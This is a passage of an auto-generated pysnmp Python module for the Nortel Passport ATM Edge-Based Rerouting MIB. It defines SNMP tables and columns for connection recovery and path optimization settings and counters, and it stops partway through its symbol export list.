if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvProvEntry.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1))).clone('yes')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvRecoverySubscribed.setStatus('mandatory')
mscAtmIfVptVccSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 8, 2, 20, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1))).clone('yes')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVptVccSrcEbrOvOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVptVccEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12))
mscAtmIfVptVccEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1), )
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoRowStatusTable.setStatus('mandatory')
mscAtmIfVptVccEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptVccEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoRowStatusEntry.setStatus('mandatory')
mscAtmIfVptVccEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 1), RowStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoRowStatus.setStatus('mandatory')
mscAtmIfVptVccEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoComponentName.setStatus('mandatory')
mscAtmIfVptVccEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoStorageType.setStatus('mandatory')
mscAtmIfVptVccEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoIndex.setStatus('mandatory')
mscAtmIfVptVccEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30), )
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoOperTable.setStatus('mandatory')
mscAtmIfVptVccEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptVccEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoOperEntry.setStatus('mandatory')
mscAtmIfVptVccEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoRecoverySubscribed.setStatus('mandatory')
mscAtmIfVptVccEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVptVccEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoConnectionRecovered.setStatus('mandatory')
mscAtmIfVptVccEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40), )
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoStatsTable.setStatus('mandatory')
mscAtmIfVptVccEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptVccEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoStatsEntry.setStatus('mandatory')
mscAtmIfVptVccEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptVccEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoTotalPathOptimizations.setStatus('mandatory')
mscAtmIfPnniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7))
mscAtmIfPnniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1), )
if mibBuilder.loadTexts: mscAtmIfPnniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfPnniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfPnniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfPnniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfPnniEbrRowStatus.setStatus('mandatory')
mscAtmIfPnniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfPnniEbrComponentName.setStatus('mandatory')
mscAtmIfPnniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfPnniEbrStorageType.setStatus('mandatory')
mscAtmIfPnniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfPnniEbrIndex.setStatus('mandatory')
mscAtmIfPnniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 20), )
if mibBuilder.loadTexts: mscAtmIfPnniEbrProvTable.setStatus('mandatory')
mscAtmIfPnniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfPnniEbrProvEntry.setStatus('mandatory')
mscAtmIfPnniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfPnniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfPnniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfPnniEbrPathOptimization.setStatus('mandatory')
mscAtmIfPnniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30), )
if mibBuilder.loadTexts: mscAtmIfPnniEbrOperTable.setStatus('mandatory')
mscAtmIfPnniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfPnniEbrOperEntry.setStatus('mandatory')
mscAtmIfPnniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfPnniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfPnniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfPnniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfPnniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfPnniEbrIneligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfPnniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 40), )
if mibBuilder.loadTexts: mscAtmIfPnniEbrStatsTable.setStatus('mandatory')
mscAtmIfPnniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfPnniEbrStatsEntry.setStatus('mandatory')
mscAtmIfPnniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfPnniEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfPnniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfPnniEbrTotalPathOptimizations.setStatus('mandatory')
atmEbrGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1))
atmEbrGroupCA = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1, 1))
atmEbrGroupCA02 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1, 1, 3))
atmEbrGroupCA02A = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1, 1, 3, 2))
atmEbrCapabilities = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 3))
atmEbrCapabilitiesCA = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 3, 1))
atmEbrCapabilitiesCA02 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 3, 1, 3))
atmEbrCapabilitiesCA02A = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 3, 1, 3, 2))
mibBuilder.exportSymbols("Nortel-MsCarrier-MscPassport-AtmEbrMIB", mscAtmIfVptPnniEbr=mscAtmIfVptPnniEbr, atmEbrGroupCA=atmEbrGroupCA, mscAtmIfUniEbrTotalConnectionRecoveries=mscAtmIfUniEbrTotalConnectionRecoveries, mscAtmIfPnniEbrComponentName=mscAtmIfPnniEbrComponentName, mscAtmIfVptPnniEbrProvEntry=mscAtmIfVptPnniEbrProvEntry, mscAtmIfVptVccEbrInfoTotalPathOptimizations=mscAtmIfVptVccEbrInfoTotalPathOptimizations, mscAtmIfIispEbrOperTable=mscAtmIfIispEbrOperTable, mscAtmIfPnniEbrStatsTable=mscAtmIfPnniEbrStatsTable, atmEbrGroup=atmEbrGroup, mscAtmIfUniEbrConnectionRecovery=mscAtmIfUniEbrConnectionRecovery, mscAtmIfVptIispEbrOperEntry=mscAtmIfVptIispEbrOperEntry, mscAtmIfVptUniEbrTotalPathOptimizations=mscAtmIfVptUniEbrTotalPathOptimizations, mscAtmIfVptVccSrcEbrOvIndex=mscAtmIfVptVccSrcEbrOvIndex, mscAtmIfUniEbr=mscAtmIfUniEbr, mscAtmIfVptUniEbrPathOptimization=mscAtmIfVptUniEbrPathOptimization, mscAtmIfUniEbrStatsEntry=mscAtmIfUniEbrStatsEntry, mscAtmIfVpcEbrInfoStorageType=mscAtmIfVpcEbrInfoStorageType, mscAtmIfVptIispEbrRowStatus=mscAtmIfVptIispEbrRowStatus, mscAtmIfPnniEbrProvTable=mscAtmIfPnniEbrProvTable, mscAtmIfVptPnniEbrSubscribedConnections=mscAtmIfVptPnniEbrSubscribedConnections, mscAtmIfVccEbrInfoTotalPathOptimizations=mscAtmIfVccEbrInfoTotalPathOptimizations, mscAtmIfVptIispEbrStatsTable=mscAtmIfVptIispEbrStatsTable, mscAtmIfVptUniEbrProvEntry=mscAtmIfVptUniEbrProvEntry, mscAtmIfVptPnniEbrEligibleRecoveredConnections=mscAtmIfVptPnniEbrEligibleRecoveredConnections, mscAtmIfVccEbrInfoComponentName=mscAtmIfVccEbrInfoComponentName, mscAtmIfVccSrcEbrOvRowStatusEntry=mscAtmIfVccSrcEbrOvRowStatusEntry, mscAtmIfPnniEbrIndex=mscAtmIfPnniEbrIndex, mscAtmIfVpcSrcEbrOvStorageType=mscAtmIfVpcSrcEbrOvStorageType, mscAtmIfIispEbrRowStatusTable=mscAtmIfIispEbrRowStatusTable, mscAtmIfVptPnniEbrPathOptimization=mscAtmIfVptPnniEbrPathOptimization, mscAtmIfIispEbrProvEntry=mscAtmIfIispEbrProvEntry, mscAtmIfVccEbrInfoRowStatusEntry=mscAtmIfVccEbrInfoRowStatusEntry, mscAtmIfVptIispEbrStorageType=mscAtmIfVptIispEbrStorageType, mscAtmIfVptPnniEbrStatsEntry=mscAtmIfVptPnniEbrStatsEntry, mscAtmIfVptVccEbrInfoIndex=mscAtmIfVptVccEbrInfoIndex, mscAtmIfPnniEbrTotalConnectionRecoveries=mscAtmIfPnniEbrTotalConnectionRecoveries, mscAtmIfVptVccEbrInfoOperTable=mscAtmIfVptVccEbrInfoOperTable, mscAtmIfPnniEbrEligibleRecoveredConnections=mscAtmIfPnniEbrEligibleRecoveredConnections, mscAtmIfVpcEbrInfoRecoverySubscribed=mscAtmIfVpcEbrInfoRecoverySubscribed, mscAtmIfVptVccSrcEbrOvProvTable=mscAtmIfVptVccSrcEbrOvProvTable, mscAtmIfVptVccEbrInfoConnectionRecovered=mscAtmIfVptVccEbrInfoConnectionRecovered, mscAtmIfVptIispEbrComponentName=mscAtmIfVptIispEbrComponentName, mscAtmIfVptUniEbrComponentName=mscAtmIfVptUniEbrComponentName, mscAtmIfVptVccEbrInfoRowStatusEntry=mscAtmIfVptVccEbrInfoRowStatusEntry, mscAtmIfIispEbrComponentName=mscAtmIfIispEbrComponentName, mscAtmIfPnniEbrOperEntry=mscAtmIfPnniEbrOperEntry, mscAtmIfVptIispEbrTotalPathOptimizations=mscAtmIfVptIispEbrTotalPathOptimizations, mscAtmIfVccEbrInfo=mscAtmIfVccEbrInfo, mscAtmIfVptUniEbrIndex=mscAtmIfVptUniEbrIndex, mscAtmIfVptUniEbrIneligibleRecoveredConnections=mscAtmIfVptUniEbrIneligibleRecoveredConnections, atmEbrCapabilitiesCA02=atmEbrCapabilitiesCA02, mscAtmIfVptUniEbrRowStatusTable=mscAtmIfVptUniEbrRowStatusTable, mscAtmIfVptVccEbrInfoRowStatusTable=mscAtmIfVptVccEbrInfoRowStatusTable, mscAtmIfVptIispEbrProvTable=mscAtmIfVptIispEbrProvTable, mscAtmIfVpcSrcEbrOvOptimizationSubscribed=mscAtmIfVpcSrcEbrOvOptimizationSubscribed, mscAtmIfIispEbrTotalPathOptimizations=mscAtmIfIispEbrTotalPathOptimizations, mscAtmIfVccSrcEbrOvComponentName=mscAtmIfVccSrcEbrOvComponentName, mscAtmIfVccSrcEbrOvOptimizationSubscribed=mscAtmIfVccSrcEbrOvOptimizationSubscribed, mscAtmIfUniEbrOperTable=mscAtmIfUniEbrOperTable, mscAtmIfIispEbrStorageType=mscAtmIfIispEbrStorageType, mscAtmIfVptVccSrcEbrOv=mscAtmIfVptVccSrcEbrOv, mscAtmIfIispEbrStatsTable=mscAtmIfIispEbrStatsTable, mscAtmIfUniEbrSubscribedConnections=mscAtmIfUniEbrSubscribedConnections, mscAtmIfUniEbrRowStatusTable=mscAtmIfUniEbrRowStatusTable, mscAtmIfIispEbrStatsEntry=mscAtmIfIispEbrStatsEntry, mscAtmIfVptVccEbrInfoOperEntry=mscAtmIfVptVccEbrInfoOperEntry, mscAtmIfIispEbrRowStatusEntry=mscAtmIfIispEbrRowStatusEntry, mscAtmIfVptIispEbrIneligibleRecoveredConnections=mscAtmIfVptIispEbrIneligibleRecoveredConnections, atmEbrCapabilitiesCA02A=atmEbrCapabilitiesCA02A, mscAtmIfVptVccEbrInfoOptimizationSubscribed=mscAtmIfVptVccEbrInfoOptimizationSubscribed, mscAtmIfVccEbrInfoIndex=mscAtmIfVccEbrInfoIndex, mscAtmIfIispEbrPathOptimization=mscAtmIfIispEbrPathOptimization, mscAtmIfPnniEbrRowStatusEntry=mscAtmIfPnniEbrRowStatusEntry, mscAtmIfVptIispEbrSubscribedConnections=mscAtmIfVptIispEbrSubscribedConnections, mscAtmIfUniEbrStatsTable=mscAtmIfUniEbrStatsTable, mscAtmIfVptUniEbrStatsTable=mscAtmIfVptUniEbrStatsTable, mscAtmIfVptPnniEbrRowStatus=mscAtmIfVptPnniEbrRowStatus, mscAtmIfVptUniEbrProvTable=mscAtmIfVptUniEbrProvTable, mscAtmIfVptUniEbrOperEntry=mscAtmIfVptUniEbrOperEntry, mscAtmIfVccEbrInfoRecoverySubscribed=mscAtmIfVccEbrInfoRecoverySubscribed, mscAtmIfVpcEbrInfo=mscAtmIfVpcEbrInfo, mscAtmIfPnniEbrIneligibleRecoveredConnections=mscAtmIfPnniEbrIneligibleRecoveredConnections, mscAtmIfVpcSrcEbrOvRowStatusTable=mscAtmIfVpcSrcEbrOvRowStatusTable, mscAtmIfVptPnniEbrIneligibleRecoveredConnections=mscAtmIfVptPnniEbrIneligibleRecoveredConnections, mscAtmIfVpcEbrInfoConnectionRecovered=mscAtmIfVpcEbrInfoConnectionRecovered, mscAtmIfVccSrcEbrOvProvTable=mscAtmIfVccSrcEbrOvProvTable, mscAtmIfVccEbrInfoRowStatusTable=mscAtmIfVccEbrInfoRowStatusTable, mscAtmIfVccEbrInfoStorageType=mscAtmIfVccEbrInfoStorageType, mscAtmIfVpcEbrInfoTotalPathOptimizations=mscAtmIfVpcEbrInfoTotalPathOptimizations, mscAtmIfVptIispEbr=mscAtmIfVptIispEbr, mscAtmIfVpcEbrInfoRowStatus=mscAtmIfVpcEbrInfoRowStatus, mscAtmIfVccSrcEbrOvRowStatusTable=mscAtmIfVccSrcEbrOvRowStatusTable, mscAtmIfIispEbrConnectionRecovery=mscAtmIfIispEbrConnectionRecovery, mscAtmIfVccSrcEbrOvProvEntry=mscAtmIfVccSrcEbrOvProvEntry, mscAtmIfUniEbrIndex=mscAtmIfUniEbrIndex, mscAtmIfVptUniEbrTotalConnectionRecoveries=mscAtmIfVptUniEbrTotalConnectionRecoveries, mscAtmIfVpcEbrInfoTotalConnectionRecoveries=mscAtmIfVpcEbrInfoTotalConnectionRecoveries, mscAtmIfVptVccSrcEbrOvRowStatusEntry=mscAtmIfVptVccSrcEbrOvRowStatusEntry, mscAtmIfIispEbrTotalConnectionRecoveries=mscAtmIfIispEbrTotalConnectionRecoveries, mscAtmIfIispEbrRowStatus=mscAtmIfIispEbrRowStatus, mscAtmIfVpcSrcEbrOvProvTable=mscAtmIfVpcSrcEbrOvProvTable, mscAtmIfVptUniEbrRowStatus=mscAtmIfVptUniEbrRowStatus, mscAtmIfPnniEbrRowStatusTable=mscAtmIfPnniEbrRowStatusTable, mscAtmIfPnniEbrStatsEntry=mscAtmIfPnniEbrStatsEntry, mscAtmIfVpcSrcEbrOvIndex=mscAtmIfVpcSrcEbrOvIndex, mscAtmIfVpcEbrInfoComponentName=mscAtmIfVpcEbrInfoComponentName, mscAtmIfVptIispEbrPathOptimization=mscAtmIfVptIispEbrPathOptimization, mscAtmIfVpcSrcEbrOvRowStatus=mscAtmIfVpcSrcEbrOvRowStatus, mscAtmIfVpcEbrInfoRowStatusEntry=mscAtmIfVpcEbrInfoRowStatusEntry, mscAtmIfVptPnniEbrOperEntry=mscAtmIfVptPnniEbrOperEntry, mscAtmIfIispEbrSubscribedConnections=mscAtmIfIispEbrSubscribedConnections, mscAtmIfVccSrcEbrOv=mscAtmIfVccSrcEbrOv, mscAtmIfVptIispEbrEligibleRecoveredConnections=mscAtmIfVptIispEbrEligibleRecoveredConnections, mscAtmIfUniEbrProvEntry=mscAtmIfUniEbrProvEntry, mscAtmIfVpcEbrInfoRowStatusTable=mscAtmIfVpcEbrInfoRowStatusTable, mscAtmIfVptPnniEbrComponentName=mscAtmIfVptPnniEbrComponentName, mscAtmIfVptPnniEbrConnectionRecovery=mscAtmIfVptPnniEbrConnectionRecovery, mscAtmIfVptVccSrcEbrOvRowStatus=mscAtmIfVptVccSrcEbrOvRowStatus, mscAtmIfVptIispEbrRowStatusTable=mscAtmIfVptIispEbrRowStatusTable, mscAtmIfVptPnniEbrStorageType=mscAtmIfVptPnniEbrStorageType, mscAtmIfVptVccEbrInfoStorageType=mscAtmIfVptVccEbrInfoStorageType, mscAtmIfIispEbr=mscAtmIfIispEbr, mscAtmIfVccEbrInfoOperEntry=mscAtmIfVccEbrInfoOperEntry, mscAtmIfVptPnniEbrTotalConnectionRecoveries=mscAtmIfVptPnniEbrTotalConnectionRecoveries, mscAtmIfPnniEbrRowStatus=mscAtmIfPnniEbrRowStatus, mscAtmIfVpcSrcEbrOvProvEntry=mscAtmIfVpcSrcEbrOvProvEntry, mscAtmIfVccEbrInfoRowStatus=mscAtmIfVccEbrInfoRowStatus, mscAtmIfVptIispEbrIndex=mscAtmIfVptIispEbrIndex, mscAtmIfVpcEbrInfoOperEntry=mscAtmIfVpcEbrInfoOperEntry, mscAtmIfVptIispEbrOperTable=mscAtmIfVptIispEbrOperTable, mscAtmIfUniEbrProvTable=mscAtmIfUniEbrProvTable, mscAtmIfPnniEbrPathOptimization=mscAtmIfPnniEbrPathOptimization, mscAtmIfVpcEbrInfoStatsTable=mscAtmIfVpcEbrInfoStatsTable, mscAtmIfVccSrcEbrOvIndex=mscAtmIfVccSrcEbrOvIndex, mscAtmIfPnniEbrSubscribedConnections=mscAtmIfPnniEbrSubscribedConnections, mscAtmIfVptIispEbrRowStatusEntry=mscAtmIfVptIispEbrRowStatusEntry, mscAtmIfIispEbrProvTable=mscAtmIfIispEbrProvTable, mscAtmIfVptVccSrcEbrOvComponentName=mscAtmIfVptVccSrcEbrOvComponentName, mscAtmIfVptUniEbrConnectionRecovery=mscAtmIfVptUniEbrConnectionRecovery, mscAtmIfVccSrcEbrOvStorageType=mscAtmIfVccSrcEbrOvStorageType, mscAtmIfVpcSrcEbrOv=mscAtmIfVpcSrcEbrOv, mscAtmIfVptPnniEbrRowStatusTable=mscAtmIfVptPnniEbrRowStatusTable, mscAtmIfUniEbrEligibleRecoveredConnections=mscAtmIfUniEbrEligibleRecoveredConnections, mscAtmIfVptUniEbrRowStatusEntry=mscAtmIfVptUniEbrRowStatusEntry, mscAtmIfVccSrcEbrOvRowStatus=mscAtmIfVccSrcEbrOvRowStatus, mscAtmIfIispEbrEligibleRecoveredConnections=mscAtmIfIispEbrEligibleRecoveredConnections, mscAtmIfPnniEbrOperTable=mscAtmIfPnniEbrOperTable, mscAtmIfVpcEbrInfoOperTable=mscAtmIfVpcEbrInfoOperTable, mscAtmIfVpcEbrInfoStatsEntry=mscAtmIfVpcEbrInfoStatsEntry, mscAtmIfVptUniEbrStorageType=mscAtmIfVptUniEbrStorageType, mscAtmIfVccEbrInfoStatsTable=mscAtmIfVccEbrInfoStatsTable, mscAtmIfVptVccEbrInfoStatsTable=mscAtmIfVptVccEbrInfoStatsTable, mscAtmIfUniEbrPathOptimization=mscAtmIfUniEbrPathOptimization, mscAtmIfVptPnniEbrStatsTable=mscAtmIfVptPnniEbrStatsTable, mscAtmIfVptUniEbrSubscribedConnections=mscAtmIfVptUniEbrSubscribedConnections, mscAtmIfVptVccEbrInfo=mscAtmIfVptVccEbrInfo, mscAtmIfPnniEbrConnectionRecovery=mscAtmIfPnniEbrConnectionRecovery, mscAtmIfVccEbrInfoConnectionRecovered=mscAtmIfVccEbrInfoConnectionRecovered, mscAtmIfVccEbrInfoStatsEntry=mscAtmIfVccEbrInfoStatsEntry, mscAtmIfVptVccEbrInfoTotalConnectionRecoveries=mscAtmIfVptVccEbrInfoTotalConnectionRecoveries, mscAtmIfUniEbrStorageType=mscAtmIfUniEbrStorageType, mscAtmIfVptUniEbrStatsEntry=mscAtmIfVptUniEbrStatsEntry, mscAtmIfVptPnniEbrProvTable=mscAtmIfVptPnniEbrProvTable, mscAtmIfVccSrcEbrOvRecoverySubscribed=mscAtmIfVccSrcEbrOvRecoverySubscribed, atmEbrCapabilities=atmEbrCapabilities, mscAtmIfUniEbrComponentName=mscAtmIfUniEbrComponentName, mscAtmIfPnniEbrTotalPathOptimizations=mscAtmIfPnniEbrTotalPathOptimizations, mscAtmIfUniEbrIneligibleRecoveredConnections=mscAtmIfUniEbrIneligibleRecoveredConnections, mscAtmIfPnniEbr=mscAtmIfPnniEbr, mscAtmIfVptIispEbrProvEntry=mscAtmIfVptIispEbrProvEntry, mscAtmIfUniEbrRowStatusEntry=mscAtmIfUniEbrRowStatusEntry, mscAtmIfVptPnniEbrRowStatusEntry=mscAtmIfVptPnniEbrRowStatusEntry, mscAtmIfVpcEbrInfoIndex=mscAtmIfVpcEbrInfoIndex, mscAtmIfVptVccSrcEbrOvProvEntry=mscAtmIfVptVccSrcEbrOvProvEntry, mscAtmIfVccEbrInfoOperTable=mscAtmIfVccEbrInfoOperTable, mscAtmIfVptVccEbrInfoStatsEntry=mscAtmIfVptVccEbrInfoStatsEntry, atmEbrGroupCA02A=atmEbrGroupCA02A, 